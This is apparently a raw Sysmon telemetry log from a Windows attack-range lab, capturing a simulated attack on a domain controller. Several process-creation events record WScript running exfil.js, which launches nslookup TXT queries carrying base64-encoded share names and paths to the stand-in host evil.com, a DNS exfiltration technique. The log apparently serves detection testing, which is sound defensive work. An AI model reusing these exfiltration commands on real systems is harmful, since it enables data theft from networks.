14:16:32.364{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.364{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8E40-000000005F02}3448C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.364{2E1864BB-17C0-629A-8C40-000000005F02}76641080C:\Windows\system32\cmd.exe{2E1864BB-17C0-629A-8E40-000000005F02}3448C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.372{2E1864BB-17C0-629A-8E40-000000005F02}3448C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-8C40-000000005F02}7664C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcjxyiu.tmp 2>&1 10341000x8000000000000000200668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.332{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-8D40-000000005F02}3288C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.332{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-8D40-000000005F02}3288C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.332{2E1864BB-17C0-629A-8D40-000000005F02}32884484C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-8C40-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.317{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8D40-000000005F02}3288C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.317{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.317{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.315{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.315{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.313{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8C40-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.312{2E1864BB-17A1-629A-783D-000000005F02}55527076C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-8C40-000000005F02}7664C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.312{2E1864BB-17C0-629A-8C40-000000005F02}7664C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcjxyiu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.295{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpzpuws.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.264{2E1864BB-17C0-629A-8A40-000000005F02}68245232C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-8B40-000000005F02}4596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.264{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.264{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.264{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.264{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.264{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8B40-000000005F02}4596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.264{2E1864BB-17C0-629A-8940-000000005F02}6888724C:\Windows\system32\cmd.exe{2E1864BB-17C0-629A-8B40-000000005F02}4596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.272{2E1864BB-17C0-629A-8B40-000000005F02}4596C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-8940-000000005F02}6888C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpzpuws.tmp 2>&1 10341000x8000000000000000200648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.233{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-8A40-000000005F02}6824C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.233{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-8A40-000000005F02}6824C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.233{2E1864BB-17C0-629A-8A40-000000005F02}68245232C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-8940-000000005F02}6888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.217{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-8A40-000000005F02}6824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.213{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.213{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.213{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 